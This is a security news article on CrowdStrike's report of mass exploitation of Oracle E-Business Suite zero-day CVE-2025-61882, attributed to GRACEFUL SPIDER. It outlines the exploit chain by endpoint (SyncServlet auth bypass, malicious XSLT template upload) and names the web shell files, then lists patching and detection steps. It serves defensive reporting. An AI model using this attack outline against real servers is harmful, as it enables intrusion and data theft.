Ddos 
CrowdStrike has sounded the alarm on an ongoing mass exploitation campaign targeting Oracle E-Business Suite (EBS) applications through a previously unknown zero-day vulnerability. The flaw, now tracked as CVE-2025-61882, enables unauthenticated remote code execution (RCE) and is already being leveraged by threat actors to steal corporate data.
CrowdStrike attributes the exploitation with moderate confidence to GRACEFUL SPIDER, a financially motivated threat group also associated with Clop ransomware operations. The firm notes, “CrowdStrike Intelligence assesses with moderate confidence that GRACEFUL SPIDER is likely involved in this campaign but cannot rule out the possibility that multiple threat actors have exploited CVE-2025-61882.”
The campaign began around August 9, 2025, when the first exploitation attempts were observed. By late September, GRACEFUL SPIDER was directly contacting victims, claiming responsibility for intrusions.
“On September 29, 2025, GRACEFUL SPIDER emailed multiple organizations and claimed they had accessed and exfiltrated data from the victim’s Oracle EBS applications.”
CrowdStrike also highlighted chatter on Telegram channels linked to cybercriminal networks, where an individual shared a purported proof-of-concept (PoC) exploit for Oracle EBS and criticized GRACEFUL SPIDER’s methods. Oracle later referenced this same exploit hash in its CVE disclosure, suggesting that the sample had already been used in the wild.
According to the report, “CrowdStrike is tracking a mass exploitation campaign almost certainly leveraging a novel zero-day vulnerability — now tracked as CVE-2025-61882 — targeting Oracle E-Business Suite (EBS) applications for the purposes of data exfiltration.”
CVE-2025-61882 is a remote code execution vulnerability that affects Oracle’s web-facing EBS applications, and it can be triggered without any authentication. The exploit chain observed by CrowdStrike begins with an HTTP POST request to /OA_HTML/SyncServlet, which initiates an authentication bypass.
“The observed activity appears to begin with an HTTP POST request to /OA_HTML/SyncServlet, which initiates the authentication-bypass portion of a multi-step exploit chain. On at least one confirmed occasion, authentication bypass was related to an administrative account within EBS.”
After bypassing authentication, attackers exploit Oracle XML Publisher’s Template Manager to upload a malicious XSLT template that executes arbitrary code when previewed.
“To achieve code execution, the adversary targeted Oracle’s XML Publisher Template Manager by issuing GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp to upload and execute a malicious XSLT template.”
The malicious template then triggers outbound network connections from the Oracle web server to attacker-controlled infrastructure, typically over port 443, allowing the deployment of web shells for persistence.
CrowdStrike observed web shells implemented through custom Java components such as FileUtils.java and Log4jConfigQpgsubFilter.java, the latter serving as a backdoor that could be invoked remotely. These scripts were loaded via the EBS filter chain to ensure memory-resident persistence, executing whenever users accessed the compromised application endpoints.
“While analysis is ongoing, these files appear to set up a web shell, with FileUtils.java serving as the downloader and Log4jConfigQpgsubFilter.java serving as the backdoor.”
The October 3, 2025 leak of a PoC exploit has significantly increased the threat level. CrowdStrike warns that the disclosure, combined with Oracle’s subsequent patch, could trigger a wave of opportunistic exploitation by both ransomware affiliates and data brokers.
CrowdStrike emphasizes immediate patching and proactive network investigation for organizations using Oracle EBS, as exploitation continues to evolve. The report outlines a series of defensive measures:
- Apply Oracle’s CVE-2025-61882 update immediately to all EBS instances.
- Investigate outbound connections from Oracle servers to detect communication with known malicious IPs.
- Review xdo_templates_vl database entries for suspicious template names or URL references.
- Check for unauthorized sessions associated with UserID 0 (sysadmin) or UserID 6 (guest).
- Consider disabling internet access to EBS instances until systems are patched.
- Deploy a web application firewall (WAF) to filter malicious requests.
Related Posts:
- CVE-2025-61882 (CVSS 9.8): Critical RCE Flaw in Oracle E-Business Suite
- US Enterprises Targeted: Silent Push Unmasks Scattered Spider’s Phishing Web
- Scattered Spider Targets the Cloud: A Growing Threat to the Insurance and Financial Sectors
- Scattered Spider Evolving: New Tactics and Spectre RAT
- CISA Sounds the Alarm on Actively Exploited Apple and Oracle Zero-Days
Donate